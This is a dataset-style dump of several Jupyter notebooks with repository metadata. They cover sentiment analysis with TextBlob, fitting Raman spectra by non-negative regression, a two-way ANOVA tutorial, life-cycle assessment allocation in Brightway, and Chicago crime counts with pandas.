[ "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code" ] ]
cb1d43e161ac0a1b17eb86b29a6555033fd973a8
3,519
ipynb
Jupyter Notebook
notebooks/analise_de_sentimento.ipynb
MauricioEloy/mlops
de4fc1204d70fa7d1caeca028d4efe33c63a3e60
[ "FTL" ]
null
null
null
notebooks/analise_de_sentimento.ipynb
MauricioEloy/mlops
de4fc1204d70fa7d1caeca028d4efe33c63a3e60
[ "FTL" ]
null
null
null
notebooks/analise_de_sentimento.ipynb
MauricioEloy/mlops
de4fc1204d70fa7d1caeca028d4efe33c63a3e60
[ "FTL" ]
null
null
null
20.108571
59
0.524013
[ [ [ "from textblob import TextBlob", "_____no_output_____" ], [ "frase = \"Python é ótimo para Machine Learning\"\ntb = TextBlob(frase)\ntb_en = tb.translate(to='en')", "_____no_output_____" ], [ "tb_en.sentiment.polarity", "_____no_output_____" ], [ "tb_en", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code" ] ]
cb1d63712576e0bb7d6a5a6051cbb848fdd34fb7
801,051
ipynb
Jupyter Notebook
notebooks/FIT.ipynb
FabioBrugnara/repo_raman
3f1af6cf6e585d5032bb5be942ddaf567b241310
[ "MIT" ]
5
2021-06-13T13:27:40.000Z
2022-03-13T09:31:39.000Z
notebooks/FIT.ipynb
FabioBrugnara/repo_raman
3f1af6cf6e585d5032bb5be942ddaf567b241310
[ "MIT" ]
null
null
null
notebooks/FIT.ipynb
FabioBrugnara/repo_raman
3f1af6cf6e585d5032bb5be942ddaf567b241310
[ "MIT" ]
null
null
null
2,130.454787
417,688
0.835353
[ [ [ "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom functions import *\n%matplotlib inline", "_____no_output_____" ] ], [ [ "Per trovare i materiali che compongono i cluster scegliamo di **non eseguire un fit su ogni spettro all'interno di un determinato cluster**, ma **procediamo mediando su tutti gli spettri presenti nei singoli cluster e fittiamo sul risultato della media.**\n\nImportiamo cosi i centroidi dei vari cluster, che vengono restituiti in automatico dall'algoritmo k-means utilizzato per la clusterizzazione.", "_____no_output_____" ], [ "## Import dei dati", "_____no_output_____" ] ], [ [ "#import dei pesi dei cluster\nlabels=np.loadtxt(\"../data/processed/CLUSTERING_labels.txt\")", "_____no_output_____" ], [ "# import dei centroidi\ndata = pd.read_csv(\"../data/processed/CLUSTERING_data_centres.csv\")\ndata.drop(labels='Unnamed: 0',inplace=True,axis=1)", "_____no_output_____" ], [ "pure_material_names,pure_materials = import_pure_spectra('../data/raw/Database Raman/BANK_LIST.dat','../data/raw/Database Raman/')", "_____no_output_____" ] ], [ [ "## Interpolazione", "_____no_output_____" ], [ "**Le frequenze di campionamento degli spettri puri sono diverse tra loro e diverse da quelle utilizzate per il campionamento degli spettri sperimentali.** Per poter eseguire un fit dobbiamo per prima cosa interpolare i dati degli spettri puri con quelli degli spettri sperimentali. Dopo l'interpolazione le frequenze degli spettri puri saranno le stesse delle frequenze degli spettri sperimentlai.", "_____no_output_____" ] ], [ [ "pure_materials_interpoled=pd.DataFrame(data.wn.copy())\nfor temp in pure_material_names:\n pure_materials_interpoled=pure_materials_interpoled.join(pd.DataFrame(np.interp(data.wn, pure_materials[temp+'_wn'] ,pure_materials[temp+'_I']),columns=[temp]))", "_____no_output_____" ] ], [ [ "Dopo aver interpolato i dati normalizziamo gli spettri puri.", "_____no_output_____" ] ], [ [ "#Normalizzazione\nfor i in pure_material_names:\n pure_materials_interpoled[i]=pure_materials_interpoled[i]/np.trapz(abs(pure_materials_interpoled[i].dropna()), x=pure_materials_interpoled.wn)", "_____no_output_____" ] ], [ [ "## Fit", "_____no_output_____" ], [ "Per fittare gli spettri puri ai dati ragioniamo in questo modo:\n\n- possiamo vedere lo spettro incognito del centroide $C$ come una combinazione lineare con coefficienti non negativi di tutti gli spettri puri $P_{i}$.\n\n- Nel nostro modello gli spettri puri $P_{i} \\in \\mathbb{R}^n$ dove $n$ e' la dimesnionalita' del vettore delle intensita' dei vari spettri.\n \n- $C = \\sum \\alpha_{i}P_{i} + P_{0} $ dove $P_{0}$ e' un parametro costante.", "_____no_output_____" ], [ "Fortunatamente nell'ultimo aggiornamento di SikitLearn (rilasciato proprio nel periodo in cui abbiamo lavorato al progetto) e' stato introdotto il parametro \"positive\" in LinearRegression, che permette di considerare solo coefficienti non negativi. Questo è stato fondamentale dato che in ogni caso sarebbe stato necessario implementarlo, altrimenti il FIT utilzzava combinazioni di coeficienti positivi e negativi per utilizzando tutti gli spettri in modo da fittare il rumore.", "_____no_output_____" ] ], [ [ "ols=LinearRegression(positive=True) #definisco il regressore", "_____no_output_____" ] ], [ [ "Per ogni cluster facciamo quindi una regressione lineare estrapolando i coefficienti e l'intercetta.", "_____no_output_____" ] ], [ [ "N_cluster=len(data.columns)-1\ncoeff=[]\nintercept=[]\nfor i in range(N_cluster):\n ols.fit(pure_materials_interpoled[pure_material_names], data[str(i)]) #ottimizziamo il modello (lineare) su i dati di training\n coeff.append(ols.coef_)\n intercept.append(ols.intercept_)", "_____no_output_____" ] ], [ [ "### Plot dei vari centroidi dei cluster e del rispettivo fit", "_____no_output_____" ] ], [ [ "fig, axs = plt.subplots(nrows = N_cluster,figsize = (16,38))\nfor i in enumerate(range(N_cluster)):\n axs[i[0]].plot(data.wn,data[str(i[0])])\n axs[i[0]].plot(pure_materials_interpoled.wn,intercept[i[0]]+np.sum(pure_materials_interpoled[pure_material_names] * coeff[i[0]] ,axis=1))\n axs[i[0]].set_title('Cluster ' + str(i[0]))\n axs[i[0]].legend(['centroide','fit'], loc='upper right')", "_____no_output_____" ] ], [ [ "## Determinazione dell'abbondanza del materiale", "_____no_output_____" ], [ "Tenendo conto del numero di spettri presenti in ogni cluster, determiniamo il materiale piu' abbondande nel campione utilizzando i coefficienti dei fit. **Otteniamo così il risultato finale: le abbondanze nel campione**.", "_____no_output_____" ] ], [ [ "#elimino il cluster a 0 (se presente) e normalizzare i coefficienti per ogni cluster\nfor temp in np.unique(labels):\n if max(data[str(int(temp))])>1e-10:\n coeff[int(temp)]=coeff[int(temp)]/sum(coeff[int(temp)])\n else:\n print(f'Identificato lo spettro piatto, non utilizzato il cluster {int(temp)}')\n coeff[int(temp)]=np.zeros(len(coeff[int(temp)]))\n\n#numero di spettri per cluster in ordine\nweights=[np.count_nonzero(labels==i) for i in range(len(data.columns)-1)]\n\n#moltiplico i coeficienti del cluster i-esimo per questo numero\nabb_notnormalized=[coeff[i]*weights[i] for i in range(len(data.columns)-1)]\n\n#e infine ho la media pesata dei coeficienti\nabb=sum(abb_notnormalized)/(sum(abb_notnormalized).sum())\n\n#Creo un Pandas dataframe con nomi e abbondanze\nabb_table=pd.DataFrame({'names':pure_material_names,'abbundances':abb})\n\n#riordino in base alla concenrazione\nabb_table.sort_values('abbundances',ascending=False,inplace=True, ignore_index=True)\n\nabb_table[abb_table['abbundances']>0.01]", "_____no_output_____" ], [ "abb_table.to_csv(\"../data/processed/abb_table.csv\")", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ] ]
cb1d675eb49af4d9340ea6e2a593edbb3ee00a43
14,276
ipynb
Jupyter Notebook
01-python-EDA-stat-univariada/07 Inferência 2/inferencia_2_anova.ipynb
sn3fru/datascience_course
ee0a505134383034e09020d9b1de18904d9b2665
[ "MIT" ]
331
2019-01-26T21:11:45.000Z
2022-03-02T11:35:16.000Z
01-python-EDA-stat-univariada/07 Inferência 2/inferencia_2_anova.ipynb
sn3fru/datascience_course
ee0a505134383034e09020d9b1de18904d9b2665
[ "MIT" ]
2
2019-11-02T22:32:13.000Z
2020-04-13T10:31:11.000Z
01-python-EDA-stat-univariada/07 Inferência 2/inferencia_2_anova.ipynb
sn3fru/datascience_course
ee0a505134383034e09020d9b1de18904d9b2665
[ "MIT" ]
88
2019-01-25T16:53:47.000Z
2022-03-03T00:05:08.000Z
30.900433
832
0.57418
[ [ [ "# Teste para Duas Médias - ANOVA (Analysis of Variance)\n\nAnálise de variância é a técnica estatística que permite avaliar afirmações sobre as médias de populações. A análise visa, fundamentalmente, verificar se existe uma diferença significativa entre as médias e se os fatores exercem influência em alguma variável dependente, com $k$ populaçõess com médias $\\mu_i$ desconhecidas.\n\nOs pressupostos básicos da análise de variância são:\n\n- As amostras são aleatórias e independentes\n- As populações têm distribuição normal (o teste é paramétrico)\n- As variâncias populacionais são iguais\n\nNa prática, esses pressupostos não precisam ser todos rigorosamente satisfeitos. Os resultados são empiricamente verdadeiros sempre que as populações são aproximadamente normais (isso é, não muito assimétricas) e têm variâncias próximas. \n\nQueremos testar se as $k$ médias são iguais, para isto vamos utilizara tabela **ANOVA - Analysis of Variance**\n\nVariação dos dados:\n\n<br>\n$$SQT = \\sum_{i=1}^{k}\\sum_{j=1}^{n_i} (x_{ij}- \\overline x)^2 = \n \\sum_{i=1}^{k}\\sum_{j=1}^{n_i} x_{ij}^2 - \n \\frac{1}{n}\\Big(\\sum_{i=1}^{k}\\sum_{j=1}^{n_i} x_{ij}\\Big)^2 $$\n<br><br>\n$$SQE = \\sum_{i=1}^{k} n_i(\\overline x_{i}- \\overline x)^2 =\n \\sum_{i=1}^{k} \\frac{1}{n_i}\\Big (\\sum_{j=1}^{n_i} x_{ij}\\Big)^2 -\n \\frac{1}{n}\\Big(\\sum_{i=1}^{k}\\sum_{j=1}^{n_i} x_{ij}\\Big)^2 $$\n<br><br>\n$$SQR = \\sum_{i=1}^{k}\\sum_{j=1}^{n_i} x_{ij}^2 -\n \\sum_{i=1}^{k} \\frac{1}{n_i}\\Big (\\sum_{j=1}^{n_i} x_{ij}\\Big)^2$$\n<br><br>\nVerifica-se que:\n\n$$SQT=SQE+SQR$$\n\nonde:\n\n- SQT: Soma dos Quadrados Total\n- SQE: Soma dos Quadrados Explicada\n- SQR: Soma dos Quadrados dos Resíduos\n\n<br><br>\n<img src=\"img/anova.png\" width=\"450\" />\n<br><br>\n\nDentro das premissas de variáveis aleatórias e independentes, o ideal é que cada uma das variáveis de um modelo explique uma determinadda parte da variável dependente. Com isso, podemos imaginar como o *fit* desejado, veriáveis independentes entre si conforme ilustrado na figura abaixo.\n\n<br><br>\n<img src=\"img/anova_explicada.png\" width=\"350\" />\n<br><br>", "_____no_output_____" ], [ "# Exemplo: DataSet de crescimento de dentes com duas terapias diferentes\n\nO DataSet representa o crescimento de dentes em animais submetidos a duas terapias alternativas, onde a resposta é o comprimento dos odontoblastos (células responsáveis pelo crescimento dentário) em 60 porquinhos-da-índia. Cada animal recebeu um dos três níveis de dose de vitamina C (0,5, 1 e 2 mg / dia) por um dos dois métodos de entrega (suco de laranja \"OJ\" ou ácido ascórbico (uma forma de vitamina C e codificada como \"CV\").\n\nUma vantagem importante do ANOVA de duas vias é que ele é mais eficiente em comparação com o one-way. Existem duas fontes de variação designáveis supp e dose em nosso exemplo - e isso ajuda a reduzir a variação de erros, tornando esse design mais eficiente. A ANOVA bidirecional (fatorial) pode ser usada para, por exemplo, comparar as médias das populações que são diferentes de duas maneiras. Também pode ser usado para analisar as respostas médias em um experimento com dois fatores. Ao contrário do One-Way ANOVA, ele nos permite testar o efeito de dois fatores ao mesmo tempo. Pode-se também testar a independência dos fatores, desde que haja mais de uma observação em cada célula. A única restrição é que o número de observações em cada célula deve ser igual (não existe tal restrição no caso de ANOVA unidirecional).\n\nDiscutimos modelos lineares mais cedo - e ANOVA é de fato um tipo de modelo linear - a diferença é que ANOVA é onde você tem fatores discretos cujo efeito em um resultado contínuo (variável) você quer entender.", "_____no_output_____" ], [ "## Importando as bibliotecas", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport statsmodels.api as sm\nfrom statsmodels.formula.api import ols\nfrom statsmodels.stats.anova import anova_lm\nfrom statsmodels.graphics.factorplots import interaction_plot\nimport matplotlib.pyplot as plt\nfrom scipy import stats", "_____no_output_____" ] ], [ [ "## Importando os dados", "_____no_output_____" ] ], [ [ "datafile = \"../../99 Datasets/ToothGrowth.csv.zip\"\ndata = pd.read_csv(datafile)", "_____no_output_____" ], [ "data.head()", "_____no_output_____" ], [ "data.info()", "_____no_output_____" ], [ "data.describe()", "_____no_output_____" ], [ "fig = interaction_plot(data.dose, data.supp, data.len,\n colors=['red','blue'], markers=['D','^'], ms=10)", "_____no_output_____" ] ], [ [ "## Calculando a soma dos quadrados\n\n<br>\n<img src=\"img/SS.png\">\n<br>", "_____no_output_____" ] ], [ [ "# Graus de liberdade\n\nN = len(data.len)\ndf_a = len(data.supp.unique()) - 1\ndf_b = len(data.dose.unique()) - 1\ndf_axb = df_a*df_b \ndf_w = N - (len(data.supp.unique())*len(data.dose.unique()))", "_____no_output_____" ], [ "grand_mean = data['len'].mean()", "_____no_output_____" ], [ "# SS para o fator A\nssq_a = sum([(data[data.supp ==l].len.mean()-grand_mean)**2 for l in data.supp])\n\n# SS para o fator B\nssq_b = sum([(data[data.dose ==l].len.mean()-grand_mean)**2 for l in data.dose])\n\n# SS total\nssq_t = sum((data.len - grand_mean)**2)\n\n## SS do resíduo\nvc = data[data.supp == 'VC']\noj = data[data.supp == 'OJ']\nvc_dose_means = [vc[vc.dose == d].len.mean() for d in vc.dose]\noj_dose_means = [oj[oj.dose == d].len.mean() for d in oj.dose]\nssq_w = sum((oj.len - oj_dose_means)**2) +sum((vc.len - vc_dose_means)**2)\n\n# SS de AxB (iterativa)\nssq_axb = ssq_t-ssq_a-ssq_b-ssq_w", "_____no_output_____" ] ], [ [ "## Média dos Quadrados", "_____no_output_____" ] ], [ [ "# MQ da A\nms_a = ssq_a/df_a\n\n# MQ de B\nms_b = ssq_b/df_b\n\n# MQ de AxB\nms_axb = ssq_axb/df_axb\n\n# MQ do resíduo\nms_w = ssq_w/df_w", "_____no_output_____" ] ], [ [ "## F-Score", "_____no_output_____" ] ], [ [ "# F-Score de A\nf_a = ms_a/ms_w\n\n# F-Score de B\nf_b = ms_b/ms_w\n\n# F-Score de C\nf_axb = ms_axb/ms_w", "_____no_output_____" ] ], [ [ "## p-Value", "_____no_output_____" ] ], [ [ "# p-Value de A\np_a = stats.f.sf(f_a, df_a, df_w)\n\n# p-Value de B\np_b = stats.f.sf(f_b, df_b, df_w)\n\n# p-Value de C\np_axb = stats.f.sf(f_axb, df_axb, df_w)", "_____no_output_____" ] ], [ [ "## Resultados", "_____no_output_____" ] ], [ [ "# Colocando os resultados em um DataFrame\n\nresults = {'sum_sq':[ssq_a, ssq_b, ssq_axb, ssq_w],\n 'df':[df_a, df_b, df_axb, df_w],\n 'F':[f_a, f_b, f_axb, 'NaN'],\n 'PR(>F)':[p_a, p_b, p_axb, 'NaN']}\ncolumns=['sum_sq', 'df', 'F', 'PR(>F)']\n \naov_table1 = pd.DataFrame(results, columns=columns,\n index=['supp', 'dose', \n 'supp:dose', 'Residual'])", "_____no_output_____" ], [ "# Calculando Eta-Squared e Omega-Squared, e imprimindo a tabela\n\ndef eta_squared(aov):\n aov['eta_sq'] = 'NaN'\n aov['eta_sq'] = aov[:-1]['sum_sq']/sum(aov['sum_sq'])\n return aov\n \ndef omega_squared(aov):\n mse = aov['sum_sq'][-1]/aov['df'][-1]\n aov['omega_sq'] = 'NaN'\n aov['omega_sq'] = (aov[:-1]['sum_sq']-(aov[:-1]['df']*mse))/(sum(aov['sum_sq'])+mse)\n return aov\n \n \neta_squared(aov_table1)\nomega_squared(aov_table1)\nprint(aov_table1)", "_____no_output_____" ] ], [ [ "### Comentários\n\nOs resultados da variável dose tem a maior distância do valor médio (sum_sq) e portanto a maior variância relatica (F-Score). Isto pode ser comprovado pelo Eta-Squared e Omega-Squared (definição abaixo).\n\n### Mais sobre Eta-Squared e Omega-Squared\n\nOutro conjunto de medidas de tamanho de efeito para variáveis independentes categóricas tem uma interpretação mais intuitiva e é mais fácil de avaliar. Eles incluem o Eta Squared, o Parcial Eta Squared e o Omega Squared. Como a estatística R Squared, todos eles têm a interpretação intuitiva da proporção da variância contabilizada.\n\nEta Squared é calculado da mesma forma que R Squared, e tem a interpretação mais equivalente: da variação total em Y, a proporção que pode ser atribuída a um X específico.\n\nO Eta Squared, no entanto, é usado especificamente em modelos ANOVA. Cada efeito categórico no modelo tem seu próprio Eta Squared, de modo que você obtenha uma medida específica e intuitiva do efeito dessa variável.\n\nA desvantagem do Eta Squared é que é uma medida tendenciosa da variância da população explicada (embora seja exata para a amostra), sempre superestima.\n\nEsse viés fica muito pequeno à medida que o tamanho da amostra aumenta, mas para amostras pequenas, uma medida de tamanho de efeito imparcial é Omega Squared. Omega Squared tem a mesma interpretação básica, mas usa medidas imparciais dos componentes de variância. Por ser uma estimativa imparcial das variâncias populacionais, o Omega Squared é sempre menor que o Eta Squared (ES).\n\nNão há padrões acordados sobre como interpretar um ES. A interpretação é basicamente subjetiva. Melhor abordagem é comparar com outros estudos.\n\nCohen (1977):\n- 0.2 = pequeno\n- 0.5 = moderado\n- 0.8 = grande", "_____no_output_____" ], [ "## ANOVA com Statsmodels", "_____no_output_____" ] ], [ [ "formula = 'len ~ C(supp) + C(dose) + C(supp):C(dose)'\nmodel = ols(formula, data).fit()\naov_table = anova_lm(model, typ=2)\n\neta_squared(aov_table)\nomega_squared(aov_table)\nprint(aov_table)", "_____no_output_____" ] ], [ [ "## Quantile-Quantile (QQplot)", "_____no_output_____" ] ], [ [ "res = model.resid \nfig = sm.qqplot(res, line='s')\nplt.show()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1db049dc50e12a5daa1cd162854aad3d59c49d
17,740
ipynb
Jupyter Notebook
dev/Multifunctionality with Brightway 2.5.ipynb
mixib/matrix_utils
6e59f4179980d705face350d839ca4bd951e3c3c
[ "BSD-3-Clause" ]
1
2021-02-22T11:57:43.000Z
2021-02-22T11:57:43.000Z
dev/Multifunctionality with Brightway 2.5.ipynb
mixib/matrix_utils
6e59f4179980d705face350d839ca4bd951e3c3c
[ "BSD-3-Clause" ]
5
2021-05-27T13:08:42.000Z
2021-11-01T20:52:55.000Z
dev/Multifunctionality with Brightway 2.5.ipynb
mixib/matrix_utils
6e59f4179980d705face350d839ca4bd951e3c3c
[ "BSD-3-Clause" ]
2
2021-06-14T09:04:08.000Z
2021-09-17T12:30:36.000Z
31.906475
1,065
0.488839
[ [ [ "# Import development libraries", "_____no_output_____" ] ], [ [ "import bw2data as bd\nimport bw2calc as bc\nimport bw_processing as bwp\nimport numpy as np\nimport matrix_utils as mu", "_____no_output_____" ] ], [ [ "# Create new project", "_____no_output_____" ] ], [ [ "bd.projects.set_current(\"Multifunctionality\")", "_____no_output_____" ] ], [ [ "Our existing implementation allows us to distinguish activities and prodducts, though not everyone does this.", "_____no_output_____" ] ], [ [ "db = bd.Database(\"background\")\ndb.write({\n (\"background\", \"1\"): {\n \"type\": \"process\",\n \"name\": \"1\",\n \"exchanges\": [{\n \"input\": (\"background\", \"bio\"),\n \"amount\": 1,\n \"type\": \"biosphere\",\n }]\n }, \n (\"background\", \"2\"): {\n \"type\": \"process\",\n \"name\": \"2\",\n \"exchanges\": [{\n \"input\": (\"background\", \"bio\"),\n \"amount\": 10,\n \"type\": \"biosphere\",\n }]\n },\n (\"background\", \"bio\"): {\n \"type\": \"biosphere\",\n \"name\": \"bio\",\n \"exchanges\": [],\n },\n (\"background\", \"3\"): {\n \"type\": \"process\",\n \"name\": \"2\",\n \"exchanges\": [\n {\n \"input\": (\"background\", \"1\"),\n \"amount\": 2,\n \"type\": \"technosphere\",\n }, {\n \"input\": (\"background\", \"2\"),\n \"amount\": 4,\n \"type\": \"technosphere\",\n }, {\n \"input\": (\"background\", \"4\"),\n \"amount\": 1,\n \"type\": \"production\",\n \n }\n ]\n },\n (\"background\", \"4\"): {\n \"type\": \"product\",\n }\n})", "Writing activities to SQLite3 database:\n0% [#####] 100% | ETA: 00:00:00\nTotal time elapsed: 00:00:00\n" ], [ "method = bd.Method((\"something\",))\nmethod.write([((\"background\", \"bio\"), 1)])", "_____no_output_____" ] ], [ [ "# LCA of background system\n\nThis database is fine and normal. It work the way we expect.\n\nHere we use the preferred calling convention for Brightway 2.5, with the convenience function `prepare_lca_inputs`.", "_____no_output_____" ] ], [ [ "fu, data_objs, _ = bd.prepare_lca_inputs(demand={(\"background\", \"4\"): 1}, method=(\"something\",))", "_____no_output_____" ], [ "lca = bc.LCA(fu, data_objs=data_objs)\nlca.lci()\nlca.lcia()\nlca.score", "_____no_output_____" ] ], [ [ "# Multifunctional activities\n\nWhat happens when we have an activity that produces multiple products?", "_____no_output_____" ] ], [ [ "db = bd.Database(\"example mf\")\ndb.write({\n # Activity\n (\"example mf\", \"1\"): {\n \"type\": \"process\",\n \"name\": \"mf 1\",\n \"exchanges\": [\n {\n \"input\": (\"example mf\", \"2\"),\n \"amount\": 2,\n \"type\": \"production\",\n }, {\n \"input\": (\"example mf\", \"3\"),\n \"amount\": 4,\n \"type\": \"production\",\n },\n {\n \"input\": (\"background\", \"1\"),\n \"amount\": 2,\n \"type\": \"technosphere\",\n }, {\n \"input\": (\"background\", \"2\"),\n \"amount\": 4,\n \"type\": \"technosphere\",\n }\n ]\n },\n # Product\n (\"example mf\", \"2\"): {\n \"type\": \"good\",\n \"price\": 4\n },\n # Product\n (\"example mf\", \"3\"): {\n \"type\": \"good\",\n \"price\": 6\n }\n})", "Writing activities to SQLite3 database:\n0% [###] 100% | ETA: 00:00:00\nTotal time elapsed: 00:00:00\n" ] ], [ [ "We can do an LCA of one of the products, but we will get a warning about a non-square matrix:", "_____no_output_____" ] ], [ [ "fu, data_objs, _ = bd.prepare_lca_inputs(demand={(\"example mf\", \"1\"): 1}, method=(\"something\",))", "_____no_output_____" ], [ "lca = bc.LCA(fu, data_objs=data_objs)\nlca.lci()", "_____no_output_____" ] ], [ [ "If we look at the technosphere matrix, we can see our background database (upper left quadrant), and the two production exchanges in the lower right:", "_____no_output_____" ] ], [ [ "lca.technosphere_matrix.toarray()", "_____no_output_____" ] ], [ [ "# Handling multifunctionality\n\nThere are many ways to do this. This notebook is an illustration of how such approaches can be madde easier using the helper libraries [bw_processing](https://github.com/brightway-lca/bw_processing) and [matrix_utils](https://github.com/brightway-lca/matrix_utils), not a statement that one approach is better (or even correct).\n\nWe create a new, in-memory \"delta\" `bw_processing` data package that gives new values for some additional columns in the matrix (the virtual activities generated by allocating each product), as well as updating values in the existing matrix.", "_____no_output_____" ] ], [ [ "def economic_allocation(dataset):\n assert isinstance(dataset, bd.backends.Activity)\n \n # Split exchanges into functional and non-functional\n functions = [exc for exc in dataset.exchanges() if exc.input.get('type') in {'good', 'waste'}]\n others = [exc for exc in dataset.exchanges() if exc.input.get('type') not in {'good', 'waste'}]\n \n for exc in functions:\n assert exc.input.get(\"price\") is not None\n\n total_value = sum([exc.input['price'] * exc['amount'] for exc in functions])\n \n # Plus one because need to add (missing) production exchanges\n n = len(functions) * (len(others) + 1) + 1\n data = np.zeros(n)\n indices = np.zeros(n, dtype=bwp.INDICES_DTYPE)\n flip = np.zeros(n, dtype=bool)\n \n for i, f in enumerate(functions):\n allocation_factor = f['amount'] * f.input['price'] / total_value\n col = bd.get_id(f.input)\n \n # Add explicit production\n data[i * (len(others) + 1)] = f['amount']\n indices[i * (len(others) + 1)] = (col, col)\n\n for j, o in enumerate(others):\n index = i * (len(others) + 1) + j + 1\n data[index] = o['amount'] * allocation_factor\n flip[index] = o['type'] in {'technosphere', 'generic consumption'}\n indices[index] = (bd.get_id(o.input), col)\n\n # Add implicit production of allocated dataset\n data[-1] = 1\n indices[-1] = (dataset.id, dataset.id)\n \n # Note: This assumes everything is in technosphere, a real function would also\n # patch the biosphere\n allocated = bwp.create_datapackage(sum_intra_duplicates=True, sum_inter_duplicates=False)\n allocated.add_persistent_vector(\n matrix=\"technosphere_matrix\",\n indices_array=indices,\n flip_array=flip,\n data_array=data,\n name=f\"Allocated version of {dataset}\",\n )\n return allocated", "_____no_output_____" ], [ "dp = economic_allocation(bd.get_activity((\"example mf\", \"1\")))", "_____no_output_____" ], [ "lca = bc.LCA({bd.get_id((\"example mf\", \"2\")): 1}, data_objs=data_objs + [dp])", "_____no_output_____" ], [ "lca.lci()", "_____no_output_____" ] ], [ [ "Note that the last two columns, when summed together, form the unallocated activity (column 4):", "_____no_output_____" ] ], [ [ "lca.technosphere_matrix.toarray()", "_____no_output_____" ] ], [ [ "To make sure what we have done is clear, we can create the matrix just for the \"delta\" data package:", "_____no_output_____" ] ], [ [ "mu.MappedMatrix(packages=[dp], matrix=\"technosphere_matrix\").matrix.toarray()", "_____no_output_____" ] ], [ [ "And we can now do LCAs of both allocated products:", "_____no_output_____" ] ], [ [ "lca.lcia()\nlca.score", "_____no_output_____" ], [ "lca = bc.LCA({bd.get_id((\"example mf\", \"3\")): 1}, data_objs=data_objs + [dp])\nlca.lci()\nlca.lcia()\nlca.score", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
cb1dbc9983635df74c08c41898d452368483b353
187,947
ipynb
Jupyter Notebook
jupyter_notebooks/Crime Data.ipynb
jessicagtz/Project-2-Chicago-Communities
2baad98c537d1f0e1a3a3abdfe83d3aacd81ae1c
[ "MIT" ]
null
null
null
jupyter_notebooks/Crime Data.ipynb
jessicagtz/Project-2-Chicago-Communities
2baad98c537d1f0e1a3a3abdfe83d3aacd81ae1c
[ "MIT" ]
null
null
null
jupyter_notebooks/Crime Data.ipynb
jessicagtz/Project-2-Chicago-Communities
2baad98c537d1f0e1a3a3abdfe83d3aacd81ae1c
[ "MIT" ]
2
2018-06-19T15:06:53.000Z
2018-06-30T18:08:17.000Z
43.476058
143
0.336217
[ [ [ "import pandas as pd\nimport numpy as np", "_____no_output_____" ], [ "crimes = pd.read_csv(\"Crimes_-_2001_to_present.csv\")\ncrimes", "_____no_output_____" ] ], [ [ "# Reported crimes per Community Area by Primary Type ", "_____no_output_____" ] ], [ [ "crime_org= pd.DataFrame(crimes.pivot_table(crimes,index=[\"Community Area\", \"Primary Type\"]))\ncrime_org", "_____no_output_____" ], [ "\ncrime_data = pd.DataFrame(crimes.pivot_table(values=[\"ID\"], index=[\"Community Area\", \"Primary Type\", \"Date\"], aggfunc=np.sum))\ncrime_data", "_____no_output_____" ] ], [ [ "# Number of Reported Crimes per Commuity Area ", "_____no_output_____" ] ], [ [ "#1) group by community area\n#2) get numbers of crime type per community area\n\ncrime_area= pd.DataFrame(crimes.groupby(\"Community Area\")[\"ID\"].count())\ncrime_area", "_____no_output_____" ] ], [ [ "# Number of Reported Crimes per Primary Type", "_____no_output_____" ] ], [ [ "crime_type= pd.DataFrame(crimes.groupby(\"Primary Type\")[\"ID\"].count())\ncrime_type", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1dc94e2730a2345fb4ded78fbd2a1fab7ca33f
64,376
ipynb
Jupyter Notebook
FINAL-TF2-FILES/TF_2_Notebooks_and_Data/01-Pandas-Crash-Course/02-DataFrames.ipynb
tanuja333/Tensorflow_Keras
e29464da56666c675667b491b12d625ffaefddd9
[ "Apache-2.0" ]
2
2020-08-14T13:42:03.000Z
2020-08-19T20:32:29.000Z
FINAL-TF2-FILES/TF_2_Notebooks_and_Data/01-Pandas-Crash-Course/02-DataFrames.ipynb
tanuja333/Tensorflow_Keras
e29464da56666c675667b491b12d625ffaefddd9
[ "Apache-2.0" ]
9
2020-09-25T21:54:00.000Z
2022-02-10T01:39:05.000Z
FINAL-TF2-FILES/TF_2_Notebooks_and_Data/01-Pandas-Crash-Course/.ipynb_checkpoints/02-DataFrames-checkpoint.ipynb
tanuja333/Tensorflow_Keras
e29464da56666c675667b491b12d625ffaefddd9
[ "Apache-2.0" ]
null
null
null
24.17424
236
0.314838
